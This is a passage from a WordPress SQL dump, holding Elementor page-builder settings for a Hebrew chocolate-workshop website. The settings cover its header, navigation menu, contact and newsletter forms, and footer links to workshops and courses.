\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(728,156,'_elementor_version','0.4'),(729,156,'_elementor_conditions','a:1:{i:0;s:21:\"include/singular/post\";}'),(734,157,'_elementor_template_type','page'),(735,157,'_elementor_edit_mode','builder'),(736,158,'_elementor_template_type','page'),(737,158,'_elementor_edit_mode','builder'),(738,157,'_wp_page_template','default'),(739,157,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\",\"menu\":\"%d7%a8%d7%90%d7%a9%d7%99\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"e0d5494\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05db\\u05ea\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05db\\u05d5\\u05ea\\u05e8\\u05ea \\u05db\\u05d0\\u05df\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34779&lm_key=ec25004589054b7cb52f27a1c66716ff\",\"webhooks_advanced_data\":\"\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(740,159,'_elementor_template_type','page'),(741,159,'_elementor_edit_mode','builder'),(742,159,'_wp_page_template','default'),(743,159,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"e0d5494\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05db\\u05ea\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05db\\u05d5\\u05ea\\u05e8\\u05ea \\u05db\\u05d0\\u05df\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 